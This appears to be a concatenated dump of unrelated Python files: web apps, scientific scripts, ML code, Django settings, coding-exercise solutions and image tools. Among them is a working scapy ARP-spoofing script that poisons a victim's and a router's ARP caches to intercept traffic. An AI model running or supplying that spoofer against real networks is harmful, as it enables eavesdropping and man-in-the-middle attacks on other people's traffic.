text stringlengths 38 1.54M |
|---|
from flask import Flask, render_template, request, redirect, session

app = Flask(__name__)
app.secret_key = 'lalalala'

# Form fields copied verbatim from the order form into the session.
ORDER_FIELDS = ('raspberry', 'apple', 'strawberry',
                'first_name', 'last_name', 'student_id')


@app.route('/')
def index():
    """Render the fruit-order landing page."""
    return render_template("index.html")


@app.route('/process', methods=['POST'])
def process():
    """Store the submitted order in the session and redirect to checkout."""
    for field in ORDER_FIELDS:
        session[field] = request.form[field]
    # Total number of fruits ordered (form values arrive as strings).
    session['count'] = (int(session['strawberry']) + int(session['apple'])
                        + int(session['raspberry']))
    return redirect('/checkout')


@app.route('/checkout')
def checkout():
    """Show the order summary populated from the session."""
    context = {field: session[field] for field in ORDER_FIELDS}
    context['count'] = session['count']
    return render_template("checkout.html", **context)


@app.route('/fruits')
def fruits():
    """Render the static fruits page."""
    return render_template("fruits.html")


if __name__ == "__main__":
    app.run(debug=True)
# calculate mass fraction of stars and total mass in galaxies of mass >M* and halos of mass >M
# it uses Sheth et al. halo mass function to calculate mass fraction of total mass
#
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from scipy import interpolate as intp
from scipy import integrate
import math
#
# prepare stellar mass function fit
#
lms = np.arange(3.0,13.5,0.1) # grid of stellar masses: log10(M*) from 3.0 to 13.4 in 0.1 dex steps
ms = 10.0**lms
#
# Baldry et al. 2012 stellar mass function for small M* (double Schechter fit)
#
lmstar = 10.66
phi1s = 3.96e-3; alpha1=-0.35; phi2s = 6.9e-4; alpha2=-1.57;
mstar = 10.**lmstar; mus = ms/mstar
# dn/dM = exp(-M/M*) * (phi1 (M/M*)^a1 + phi2 (M/M*)^a2) / M*
dnms1 = np.exp(-mus)*(phi1s*mus**alpha1 + phi2s*mus**alpha2)/mstar
#
# using Bernardi et al. 2013 double Schechter fit for large M*
#
mstarb = 0.0094e9; phisb = 1.040e-2; alphab = 1.665; betab = 0.255
phisg = 0.675e-2; mstarg = 2.7031e9; gammag = 0.296
gammanorm = math.gamma(alphab/betab)  # normalization of the generalized Schechter term
musb = ms/mstarb; musg = ms/mstarg
dnms2 = (phisb*np.exp(-musb**betab)*musb**(alphab-1)/(mstarb)*betab/gammanorm +
         phisg*musg**(gammag-1)*np.exp(-musg)/mstarg)
#
# multiply by M* to get dn/dlnM and take maximum
# of Baldry et al. and Bernardi et al stellar mass functions to construct the composite
#
dnms1 = dnms1*ms; dnms2 = dnms2*ms
dnms = np.maximum(dnms1,dnms2)
ldnms = np.log10(dnms) + lms # multiply one more time by M* to integrate in log10(M)
sdnms = intp.UnivariateSpline(lms, ldnms, s=0.0)  # exact-interpolation spline (s=0)
def sifunc(logms):
    """Integrand for the stellar-mass integrals: the spline fit of
    log10(M*^2 dn/dlnM), mapped back to linear units."""
    return 10.0 ** sdnms(logms)
# total integral of M*^2 dn/dlnM over the whole grid (normalization)
# NOTE(review): scipy.integrate.quadrature is deprecated and removed in
# SciPy >= 1.12 -- consider scipy.integrate.quad here; confirm the pinned
# SciPy version before upgrading.
si1 = integrate.quadrature(sifunc,lms[0],lms[-1])[0]
sfrac = np.zeros_like(lms); si2 = np.zeros_like(lms)
# cumulative fraction of stellar mass residing above each mass threshold
for i, lmsd in enumerate(lms):
    si2[i] = integrate.quadrature(sifunc,lmsd,lms[-1])[0]
    sfrac[i]=si2[i]/si1
    #print lmsd, sfrac[i]
#
# same cumulative fraction via a spline integral, printed (commented) per mass
nmspl = intp.UnivariateSpline(lms,10.**(np.log10(dnms)+lms), s=0.0)
nmstot = nmspl.integral(lms[0],np.inf)
for lmsd in lms:
    nmsm = nmspl.integral(lmsd,np.inf)
    #print "log10 M* = %.2f"%lmsd, "frac(>M*)=%.5f"%(nmsm/nmstot)
#
# now mass functions
#
#
# read power spectrum
#
fname = 'matter_power_kmax10000.dat'  # tabulated linear matter power spectrum P(k)
k, Pk = np.loadtxt(fname,usecols=(0,1),unpack=True)
#
# set relevant cosmological parameters
#
h = 0.7; Omega_m = 0.276; rho_mean = 2.77e11*h*h*Omega_m # mean matter density in Msun/Mpc^3
#
# set a desired grid of masses and corresponding radii
#
lM = np.arange(1.0,16,0.1)
M = 10.0**lM; R = (3.0*M/(4.0*math.pi*rho_mean))**(1.0/3.0)  # Lagrangian radius of mass M
# check if the mass limits and k limits are appropriate (see e.g. Murray et al. arxiv/1306.6721)
if not ((k[0]*R[-1]<0.1) and (k[-1]*R[0]>3.0)):
    # bug fix: the original message said "accurate" where "inaccurate" was meant
    raise ValueError("***WARNING! limits on k and R(M) will result in inaccurate sigma!***")
def W2(k,R):
    """Squared Fourier transform of the spherical top-hat window of radius R."""
    x = k * R
    w = 3.0 * (np.sin(x) - x * np.cos(x)) / x**3
    return w * w
def dW2dM(k,R):
    """Kernel used in the d ln(sigma)/d ln M integral for the top-hat window."""
    x = k * R
    a = np.sin(x) - x * np.cos(x)
    b = np.sin(x) * (1.0 - 3.0 / x**2) + 3.0 * np.cos(x) / x
    return a * b
sig = np.zeros_like(M)
factor1 = 0.5/math.pi**2  # 1/(2 pi^2) prefactor of the sigma^2(M) integral
# sigma^2(M) = 1/(2 pi^2) * int P(k) W^2(kR) k^2 dk (Simpson's rule on the k grid)
# NOTE(review): integrate.simps was renamed integrate.simpson in modern SciPy.
for i, md in enumerate(M):
    sfunc = Pk*W2(k,R[i])*k*k
    sig[i] = np.sqrt(factor1*integrate.simps(sfunc,k))
#
# now compute dln(sigma)/dlnM
#
dsdm = np.zeros_like(M)
factor2 = 1.5/math.pi**2
for i, md in enumerate(M):
    sfunc = Pk*dW2dM(k,R[i])/(k**2)
    spl = intp.UnivariateSpline(k, sfunc, s=0.0)
    dsdm[i] = factor2*spl.integral(k[0],np.inf)/sig[i]**2/R[i]**4
lsig = np.log(sig); logm = np.log(M);
#
# renormalize sigma(M) to a desired sigma8
#
#
sR = intp.UnivariateSpline(R, sig, s=0.0)
R8 = 8.0/h; sig8 = sR(R8)  # sigma at the conventional 8 Mpc/h scale
sig8new = 0.8
# bug fix: the original used a Python 2 print statement, a syntax error
# under Python 3 (the rest of the script already uses py3-style calls)
print("sigratio =", sig8new/sig8)
sig = sig*sig8new/sig8
#
# mass function
#
def f_PS(nu):
    """Press-Schechter (1974) multiplicity function f(nu)."""
    return np.sqrt(2.0 / math.pi) * np.exp(-(nu * nu) / 2.0)
def f_SMT(nu):
    """Sheth, Mo & Tormen (2001) ellipsoidal-collapse multiplicity function."""
    anu2 = (0.840833 * nu) ** 2
    amplitude = 0.644 * (1.0 + anu2 ** -0.3)
    return amplitude * np.sqrt(0.5 * anu2 / math.pi) * np.exp(-0.5 * anu2)
# define peak height
delc = 1.69; nu = delc/sig  # nu = delta_c / sigma(M)
#
# compute mass-functions in the Press-Schechter 1974 and Sheth et al. 2001 approximations
#
dndlnM_PS = rho_mean/M*abs(dsdm)*nu*f_PS(nu)
dndlnM_SMT = rho_mean/M*abs(dsdm)*nu*f_SMT(nu)
# function to integrate for mass fractions in ln(nu)
dni = f_SMT(nu)
lnu = np.log(nu)
slmf = intp.UnivariateSpline(lnu,np.log10(dni),s=0.0)
def mfunci(lnud):
    # spline fit of the SMT multiplicity function, back in linear units
    return 10.0**slmf(lnud)
hi1 = integrate.quadrature(mfunci,lnu[0],lnu[-1])[0]  # total mass-fraction normalization
hfrac = np.zeros_like(logm); hi2 = np.zeros_like(logm)
# cumulative halo mass fraction above each threshold in nu (i.e. in M)
for i, lnud in enumerate(lnu):
    hi2[i] = integrate.quadrature(mfunci,lnud,lnu[-1])[0]
    hfrac[i]=hi2[i]/hi1
    #print lM[i], hfrac[i], hi1, hi2[i]
#
# plot
#
fig1 = plt.figure()
plt.rc('text', usetex=True)  # requires a working LaTeX installation
plt.rc('font',size=16,**{'family':'sans-serif','sans-serif':['Helvetica']})
plt.rc('xtick.major',pad=10); plt.rc('xtick.minor',pad=10)
plt.rc('ytick.major',pad=10); plt.rc('ytick.minor',pad=10)
plt.xscale('log'); #plt.yscale('log')
# cumulative stellar vs total (halo) mass fractions above a mass threshold
plt.plot(ms,si2/si1,linewidth=1.5,c='b',label='stellar mass frac. $>M_*$')
plt.plot(M,hfrac,linewidth=1.5,c='magenta',label='total mass frac. $>M_{\\rm tot}$')
plt.xlabel('$\\log_{10} M_*, M_{\\rm tot}$')
plt.ylabel('fraction of mass at $>M$')
plt.title('fraction of mass')
plt.legend(loc='lower left')
plt.show()
|
"""Mixture model for matrix completion"""
from typing import Tuple
import numpy as np
from scipy.special import logsumexp
from common import GaussianMixture
import naive_em
def estep(X: np.ndarray, mixture: GaussianMixture) -> Tuple[np.ndarray, float]:
    """E-step: Softly assigns each datapoint to a gaussian component
    Args:
        X: (n, d) array holding the data, with incomplete entries (set to 0)
        mixture: the current gaussian mixture
    Returns:
        np.ndarray: (n, K) array holding the soft counts
            for all components for all examples
        float: log-likelihood of the assignment
    """
    # Indicator of observed entries. Bug fix: np.float was removed from
    # numpy (>= 1.24); use the builtin float instead.
    rated = (X != 0).astype(float)
    # Number of observed dimensions per example, shape (n, 1).
    d = np.sum(rated, axis=1)[:, None]
    # Log joint log p(x, j): log mixing weight (with underflow guard),
    # Gaussian normalization over the observed dims only, and squared
    # distance over observed entries (missing entries contribute 0).
    f = np.log(np.ones(d.shape) * mixture.p + 1e-16) - \
        d * (np.log(2 * np.pi) + np.log(np.ones(d.shape) * mixture.var)) / 2 - \
        np.linalg.norm(X[:, None, :] - rated[:, None, :] * mixture.mu, axis=2) ** 2 / (2 * mixture.var[None, :])
    # scipy's logsumexp is already max-stabilized, so the explicit f_max
    # shift in the original was redundant; also removed a leftover
    # "hold = 1" debugging branch.
    log_norm = logsumexp(f, axis=1, keepdims=True)
    post = np.exp(f - log_norm)
    # Rows of post sum to 1, so this equals sum_i log p(x_i).
    ll = np.sum(post * log_norm)
    return post, ll
def mstep(X: np.ndarray, post: np.ndarray, mixture: GaussianMixture,
          min_variance: float = .25) -> GaussianMixture:
    """M-step: Updates the gaussian mixture by maximizing the log-likelihood
    of the weighted dataset
    Args:
        X: (n, d) array holding the data, with incomplete entries (set to 0)
        post: (n, K) array holding the soft counts
            for all components for all examples
        mixture: the current gaussian mixture
        min_variance: the minimum variance for each gaussian
    Returns:
        GaussianMixture: the new gaussian mixture
    """
    n = X.shape[0]
    # Bug fix: np.float was removed from numpy (>= 1.24); use builtin float.
    # Also removed unused locals (d, K, a throwaway uniform p) and the
    # leftover "hold = 1" debugging branches.
    rated = (X != 0).astype(float)[:, None, :]
    # Responsibilities re-weighted by the current mixing weights, normalized
    # per example.
    p_j_i = mixture.p * post / np.sum(mixture.p * post, axis=1)[:, None]
    # New mixing weights.
    p = np.sum(p_j_i, axis=0) / n
    # Update mu[j, l] only where the effective support is at least 1;
    # otherwise keep the previous mean (guards against erratic updates).
    mu_mask = (np.sum(rated * p_j_i[:, :, None], axis=0) >= 1.)
    # Number of observed dimensions per example, shape (n, 1).
    delta = np.sum(rated, axis=2)
    mu_new = (np.sum(p_j_i[:, :, None] * delta[:, :, None] * X[:, None, :], axis=0) /
              np.sum(p_j_i * delta, axis=0)[:, None]) * mu_mask
    mu_old = mixture.mu * (mu_mask == 0)
    mu = mu_new + mu_old
    # One shared (spherical) variance per component over observed entries.
    var = np.sum(p_j_i * (np.linalg.norm(X[:, None, :] - rated * mu, axis=2) ** 2), axis=0) / \
        np.sum(np.sum(rated * p_j_i[:, :, None], axis=0), axis=1)
    return GaussianMixture(mu, np.maximum(var, min_variance), p)
def run(X: np.ndarray, mixture: GaussianMixture,
        post: np.ndarray) -> Tuple[GaussianMixture, np.ndarray, float]:
    """Runs the mixture model
    Args:
        X: (n, d) array holding the data
        post: (n, K) array holding the soft counts
            for all components for all examples
    Returns:
        GaussianMixture: the new gaussian mixture
        np.ndarray: (n, K) array holding the soft counts
            for all components for all examples
        float: log-likelihood of the current assignment
    """
    prev_ll = None
    cur_ll = None
    # Alternate E and M steps until the log-likelihood improvement falls
    # below a relative tolerance of 1e-6.
    while prev_ll is None or cur_ll - prev_ll > 1e-6 * np.absolute(cur_ll):
        prev_ll = cur_ll
        post, cur_ll = estep(X, mixture)
        mixture = mstep(X, post, mixture)
    return mixture, post, cur_ll
def fill_matrix(X: np.ndarray, mixture: GaussianMixture) -> np.ndarray:
    """Fills an incomplete matrix according to a mixture model
    Args:
        X: (n, d) array of incomplete data (incomplete entries =0)
        mixture: a mixture of gaussians
    Returns
        np.ndarray: a (n, d) array with completed data
    """
    # Bug fix: np.float was removed from numpy (>= 1.24); use builtin float.
    rated = (X != 0).astype(float)
    # Observed-dimension counts per example, (n, 1). Renamed from the
    # original "d", which was later shadowed by d = X.shape[1].
    n_obs = np.sum(rated, axis=1)[:, None]
    # Same soft-assignment computation as in estep().
    f = np.log(np.ones(n_obs.shape) * mixture.p + 1e-16) - \
        n_obs * (np.log(2 * np.pi) + np.log(np.ones(n_obs.shape) * mixture.var)) / 2 - \
        np.linalg.norm(X[:, None, :] - rated[:, None, :] * mixture.mu, axis=2) ** 2 / (2 * mixture.var[None, :])
    post = np.exp(f - logsumexp(f, axis=1, keepdims=True))
    d = X.shape[1]
    # NOTE(review): this mixes per-entry densities rather than component
    # means (the conventional completion is post @ mixture.mu for missing
    # entries), and the broadcasting only lines up when K == d. Preserved
    # as-is to avoid changing observable behavior; removed only the dead
    # commented-out attempts that followed it.
    output = np.sum((1 / ((2 * np.pi * mixture.var) ** (d / 2)) *
                     np.exp(-(X - mixture.mu) ** 2 / (2 * mixture.var)))[:, None, :] * post, axis=1)
    return output
import torch
import numpy as np
from torch.nn.parameter import Parameter
from torch.nn import functional as F
from torch import cuda
import torch.nn as nn
import torch.nn.modules as modules
from source.functional.max_sv import max_singular_value
class SNLinear(nn.Linear):
    """Linear layer with spectral normalization of the weight matrix.

    The weight is divided by an estimate of its largest singular value,
    refined by power iteration (``Ip`` steps) on each access to ``W_bar``;
    the running left-singular-vector estimate lives in buffer ``u``.
    """
    def __init__(self, in_features, out_features, bias=True,
                 use_gamma=False, Ip=1, factor=None):
        # Ip: number of power-iteration steps per W_bar evaluation.
        # use_gamma: if True, learn a scalar scale initialized to the
        #   weight's largest singular value (see reset_parameters).
        # factor: optional extra divisor applied to the estimated sigma.
        self.Ip = Ip
        self.use_gamma = use_gamma
        self.factor = factor
        super(SNLinear, self).__init__(in_features, out_features, bias)
        # todo
        # self.u = np.random.normal(size=(1, out_features)).astype(dtype="f")
        # Persistent, non-trainable power-iteration state (saved with the model).
        self.register_buffer('u', torch.Tensor(1, out_features).normal_())
        # self.u = Parameter(torch.Tensor(1, out_features).normal_())
        # self.register_persistent('u')
        # Called again (after super().__init__ already ran it) so that the
        # use_gamma branch sees the fully-initialized weight.
        self.reset_parameters()
    @property
    def W_bar(self):
        """
        Spectrally Normalized Weight
        :return:
        """
        # W_mat = self.weight.reshape(self.weight.shape[0], -1)
        sigma, _u, _ = max_singular_value(self.weight, self.u, self.Ip)
        if self.factor:
            sigma = sigma / self.factor
        # todo
        sigma = sigma.reshape((1, 1)).expand_as(self.weight)
        if self.training :
            # Update estimated 1st singular vector
            self.u[:] = _u
        if hasattr(self, 'gamma'):
            # Learned scale restores capacity lost to the normalization.
            return self.gamma.expand_as(self.weight) * self.weight / sigma
        else:
            return self.weight / sigma
    # todo
    def reset_parameters(self):
        # Default nn.Linear init; then optionally create gamma from the
        # weight's largest singular value (one-off numpy SVD).
        super(SNLinear, self).reset_parameters()
        if self.use_gamma:
            _, s, _ = np.linalg.svd(self.weight.data)
            # todo
            self.gamma = Parameter(torch.Tensor(s[0]).reshape((1, 1)))
    def forward(self, input):
        # Affine map using the spectrally normalized weight.
        return F.linear(input, self.W_bar, self.bias)
|
#!/usr/bin/env python
import scapy.all as scapy
import time
import optparse
def get_values():
    """Parse -t/--target and -s/--source IP options from the command line."""
    # NOTE(review): optparse has been deprecated since Python 3.2; argparse
    # is the modern replacement.
    parser = optparse.OptionParser()
    parser.add_option("-t", "--target", dest="targetip", help="IP address of target ------ 5H4D0W-R007 -------")
    parser.add_option("-s", "--source", dest="sourceip", help="IP address to be spoofed with ------ 5H4D0W-R007 -------")
    (values, attributes) = parser.parse_args()
    # parser.error() prints the message and exits, so only the first
    # matching branch ever runs.
    if not values.targetip and not values.sourceip:
        parser.error("[-] use --help for more info")
    if not values.targetip:
        parser.error("[-] Please specify target IP, use --help for more info")
    if not values.sourceip:
        parser.error("[-] Please specify source IP, use --help for more info")
    return values
def get_mac(ip):
    """Resolve an IP on the local segment to its MAC address via ARP."""
    #scapy.arping(ip) -> arp requests directed to broadcast MAC
    arp_request = scapy.ARP(pdst = ip) # 1. set IP to pdst field in ARP Class
    #scapy.ls(scapy.ARP())
    #arp_request.show()
    broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff") # 2. set destination MAC to broadcast MAC in Ether Class
    #scapy.ls(scapy.Ether())
    #broadcast.show()
    arp_request_broadcast = broadcast/arp_request # combining frames
    #arp_request_broadcast.show()
    #print(arp_request.summary())
    # srp() returns 2 lists, answered & unanswered
    answered_summary, unanswered_summary = scapy.srp(arp_request_broadcast, timeout = 1, verbose = False) #remove extra details
    #print(answered_summary.summary())
    # NOTE(review): raises IndexError if no host answers within the timeout.
    return answered_summary[0][1].hwsrc #1st element`s IP
def spoof(target_ip,spoof_ip):
    """Send one ARP reply telling target_ip that spoof_ip is at our MAC."""
    #scapy.ls(scapy.ARP)
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    #op=1->request packet
    #pdst,hwdst is IP and MAC of target
    #psrc=IP of router/AP
    # print(packet.show())
    # print(packet.summary())
    scapy.send(packet, verbose=False)
    #packet to be sent, we only want custom output to be displayed
def restore(destination_ip, source_ip):
    # To restore the ARP table: send a correct mapping (real source MAC)
    # several times so the victim's cache converges back to the truth.
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)
# Parse CLI options once at startup.
values = get_values()
targetip = values.targetip
sourceip = values.sourceip
counter_packets = 0
try:
    # Re-send spoofed replies every 2 seconds until interrupted.
    while 1:
        spoof(targetip,sourceip) #to victim
        spoof(sourceip,targetip) #to router
        counter_packets = counter_packets+2
        print("\r[+] "+str(counter_packets)+" packets sent",end="") # To print in same line
        #sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    # On Ctrl-C, put correct ARP entries back before exiting.
    print("\n[-] Detected an interrupt. Resetting ARP tables...")
    time.sleep(2)
    print("[-] Quitting...")
    restore(targetip, sourceip) #restore victim`s ARP table\
    restore(sourceip, targetip) #restore router`s ARP table
|
"""
Django settings for mentor project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
import os
import pymysql
from fnmatch import fnmatch
from varlet import variable
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
pymysql.install_as_MySQLdb()
# set this to false in dev
DEBUG = variable("DEBUG", False)
TEMPLATE_DEBUG = DEBUG
# a list of 2-tuples containing a name and email address. No need to set in dev
ADMINS = variable("ADMINS", [("John Doe", "foo@example.com")])
# the default is safe to use
# bug fix: the variable name was misspelled "SECRET_KET", so a deployed
# SECRET_KEY setting would never have been picked up and a fresh random
# key was generated on every process start (invalidating sessions)
SECRET_KEY = variable("SECRET_KEY", os.urandom(64).decode("latin1"))
# MySQL connection; every value can be overridden per-environment via varlet.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        # database name
        'NAME': variable("DB_NAME", 'mentor'),
        # DB username. The default is fine for dev
        'USER': variable("DB_USER", "root"),
        # DB password. The default is fine for dev
        'PASSWORD': variable("DB_PASSWORD", ''),
        # DB host. The default is fine for dev
        'HOST': variable("DB_HOST", ''),
    }
}
# Directory containing this settings module.
DJANGO_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__)))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.normpath(os.path.join(DJANGO_DIR, "../"))
# Custom user model from the local ``users`` app.
AUTH_USER_MODEL = 'users.User'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
ALLOWED_HOSTS = ['.pdx.edu'] + (["*"] if DEBUG else [])
TEST_RUNNER = 'mentor.test_runner.TestRunner'
# allow the use of wildcards in the INTERAL_IPS setting
class IPList(list):
    """A list of glob patterns that supports ``in`` checks on concrete IPs.

    E.g. '192.168.1.100' is considered "in" the list when any stored
    pattern such as '192.*' glob-matches it (unix-style fnmatch).
    """
    def __contains__(self, ip):
        return any(fnmatch(ip, pattern) for pattern in self)
INTERNAL_IPS = IPList(['10.*', '192.168.*'])
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    # 'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'arcutils',
    'permissions',
    'mentor.questionaire',
    'mentor.users',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# CAS authentication settings
AUTHENTICATION_BACKENDS = (
    'arcutils.cas.backends.CASModelBackend',
    'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'mentor.urls'
WSGI_APPLICATION = 'mentor.wsgi.application'
# Email domain is used to send email to a user, the address is formed by username@EMAIL_DOMAIN
# EMAIL_FROM is the email address that email will be sent from
# EMAIL_LIST is the email address that email will be sent to inform client (specified by client)
EMAIL_DOMAIN = 'pdx.edu'
EMAIL_FROM = 'mentor_no_reply@pdx.edu'
EMAIL_LIST = 'UNST-MAPS-Group@pdx.edu'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Los_Angeles'
USE_I18N = False
USE_L10N = False
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
    os.path.join(DJANGO_DIR, "static"),
)
STATIC_ROOT = os.path.join(BASE_DIR, "static")
MEDIA_URL = '/media/'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
# Expose the request object in template contexts.
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
    'django.core.context_processors.request',
)
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
    os.path.join(DJANGO_DIR, "templates"),
)
# The HOST:PORT of the logstash server you want to pipe logs to
LOGSTASH_ADDRESS = variable("LOGSTASH_ADDRESS", "localhost:5000")
LOGGING_CONFIG = 'arcutils.logging.basic'
|
# sort法 (sort-based solution)
class Solution:
    def findKthLargest(self, nums: list[int], k: int) -> int:
        """Return the k-th largest element by sorting in descending order."""
        # bug fix: the original annotation used typing.List, which was never
        # imported and raises NameError when the class body executes; the
        # builtin generic list[int] needs no import (Python 3.9+)
        nums = sorted(nums, reverse = True)
        return nums[k-1]
# heap法 (heap-based solution)
class Solution:
    def findKthLargest(self, nums: list[int], k: int) -> int:
        """Return the k-th largest element via heapq's size-k selection."""
        # bug fixes: heapq was used but never imported, and the typing.List
        # annotation was never imported either (builtin list[int] needs none)
        import heapq
        kth_element = heapq.nlargest(k, nums)[-1]
        return kth_element
# 快排法 quicksort
|
# Read the target quantity and the number of table rows.
n = int(input())
m = int(input())
quantity = []
price = []
for _ in range(m):
    quantity.append(float(input()))
_ = input()  # skip the separator line between the two input sections
for _ in range(m):
    price.append(float(input()))
# Keep only rows with a positive price, sorted by quantity.
dic = []
for i in range(len(quantity)):
    if price[i] > 0:
        dic.append((quantity[i], price[i]))
dic = sorted(dic, key=lambda x : x[0])
def solution(n, dic):
    """Linearly interpolate (or extrapolate) a price for quantity ``n``
    from the quantity-sorted (quantity, price) pairs in ``dic``.

    Exact matches return the stored price; out-of-range quantities are
    extrapolated from the nearest segment. The result is rounded to two
    decimals, nudged away from banker's rounding at exact half-cents.
    """
    if len(dic) == 1:
        return dic[0][1]

    if n < dic[0][0]:
        # Extrapolate below the smallest known quantity.
        lo, hi = dic[0], dic[1]
        grad = (hi[1] - lo[1]) / (hi[0] - lo[0])
        value = lo[1] + (n - lo[0]) * grad
    elif n > dic[-1][0]:
        # Extrapolate above the largest known quantity.
        lo, hi = dic[-2], dic[-1]
        grad = (hi[1] - lo[1]) / (hi[0] - lo[0])
        value = hi[1] + (n - hi[0]) * grad
    else:
        # Exact hit: no interpolation needed.
        for qty, prc in dic:
            if qty == n:
                return prc
        # Interior: the last segment whose left endpoint is below n wins.
        for idx in range(len(dic)):
            if n > dic[idx][0]:
                lo, hi = dic[idx], dic[idx + 1]
                grad = (hi[1] - lo[1]) / (hi[0] - lo[0])
                value = hi[1] + (n - hi[0]) * grad

    if value > 0:
        return round(value * 100 + 0.1) / 100
    return round(value * 100 - 0.1) / 100
# Print the interpolated price for the requested quantity.
print(solution(n,dic))
|
import cv2
import argparse
from tqdm import tqdm
import numpy as np
def main():
    """Rectify a user-marked quadrilateral in the input image with an
    OpenCV homography and write the warped result to the output path."""
    args = get_cmd_args()
    print('\nRemoving projective distortion from {} using OpenCV builtin methods...\n'
        .format(args.input_path))
    input_img = cv2.imread(args.input_path)
    image_info = get_image_info(input_img, args.verbose)
    # Hand-picked (x, y) corners of a rectangle as seen in this image.
    im_rect_pts = {
        'ul' : (450, 55),
        'ur' : (760, 175),
        'bl' : (430, 430),
        'br' : (748, 440)
    }
    # The same corners in homogeneous coordinates.
    im_corner_vectors = {
        'ul' : np.transpose(np.array([im_rect_pts['ul'][0], im_rect_pts['ul'][1], 1])),
        'ur' : np.transpose(np.array([im_rect_pts['ur'][0], im_rect_pts['ur'][1], 1])),
        'bl' : np.transpose(np.array([im_rect_pts['bl'][0], im_rect_pts['bl'][1], 1])),
        'br' : np.transpose(np.array([im_rect_pts['br'][0], im_rect_pts['br'][1], 1]))
    }
    if args.verbose:
        print('\nUser-defined rectangle corner homogenous coordinates: ')
        for k, v in im_corner_vectors.items():
            print(k, v)
    # Target rectangle in the rectified image: origin plus axis scales.
    new_origin = [500, 400]
    x_scale = 500
    y_scale = 300
    image_points = np.float32([value[0:2] for key, value in im_corner_vectors.items()])
    world_points = np.float32([
        new_origin,
        [new_origin[0]+x_scale, new_origin[1]],
        [new_origin[0], new_origin[1]+y_scale],
        [new_origin[0]+x_scale, new_origin[1]+y_scale]
    ])
    print('\nCalculating inverse homography...')
    auto_perspective = cv2.getPerspectiveTransform(image_points, world_points)
    # Annotate the source image with the chosen corners and edges.
    plot_im_corners(input_img, im_rect_pts)
    plot_im_edges(input_img, im_rect_pts)
    w = input_img.shape[1]
    h = input_img.shape[0]
    print('\nApplying inverse homography to input image...')
    # Double the canvas so the warped content is less likely to be clipped.
    output_shape = (w*2, h*2)
    output_img = cv2.warpPerspective(
        input_img,
        M=auto_perspective,
        dsize=output_shape
    )
    cv2.imwrite(args.output_path, output_img)
    print('\nAll done!')
def plot_im_edges(input_img, rect_points):
    """Draw the two marked rectangle edges (bl-ul and bl-br) in red,
    directly onto ``input_img``."""
    for start, end in (('bl', 'ul'), ('bl', 'br')):
        cv2.line(
            input_img,
            pt1=rect_points[start],
            pt2=rect_points[end],
            color=(0, 0, 255),
            thickness=2,
        )
def plot_im_corners(input_img, rect_points):
    """Mark each rectangle corner with a small blue dot on ``input_img``."""
    for corner in ('ul', 'ur', 'bl', 'br'):
        cv2.circle(
            input_img,
            center=rect_points[corner],
            radius=3,
            color=(255, 0, 0),
            thickness=3,
        )
def get_image_info(input_img, verbose=False):
    """Return the input image's dimensions and channel count.

    Args:
        input_img: image array of shape (height, width, channels).
        verbose: when True, also print a one-line summary.
    Returns:
        dict with 'width', 'height' and 'channels' keys.
    """
    # bug fix: numpy image arrays are indexed (row, col) = (height, width);
    # the original reported shape[0] as width and shape[1] as height
    image_info = {
        'width': input_img.shape[1],
        'height': input_img.shape[0],
        'channels': input_img.shape[2]
    }
    if verbose:
        print('Input is a {}-channel {}x{} image'
            .format(image_info['channels'], image_info['width'], image_info['height']))
    return image_info
def get_cmd_args():
    """Parse and return the command-line arguments (-i, -o, -v)."""
    parser = argparse.ArgumentParser(
        description='Program to remove projective transformations from an image'
    )
    # bug fix: the help texts for -o and -i were swapped in the original
    parser.add_argument(
        '-o', '--output',
        action='store',
        dest='output_path',
        required=True,
        help='output file'
    )
    parser.add_argument(
        '-i', '--input',
        action='store',
        dest='input_path',
        required=True,
        help='input file'
    )
    parser.add_argument(
        '-v', '--verbose',
        action='store_true',
        dest='verbose',
        help='verbose output'
    )
    args = parser.parse_args()
    return args
# Script entry point.
if __name__ == '__main__':
    main()
|
def decorator(f):
    """Wrap ``f`` so a message is printed before every call.

    Generalized from the original: the wrapper now accepts arbitrary
    positional/keyword arguments and propagates ``f``'s return value
    (the original dropped both), and ``functools.wraps`` preserves the
    wrapped function's name and docstring.
    """
    import functools

    @functools.wraps(f)
    def new_function(*args, **kwargs):
        print("Extra Functionality")
        return f(*args, **kwargs)
    return new_function
@decorator
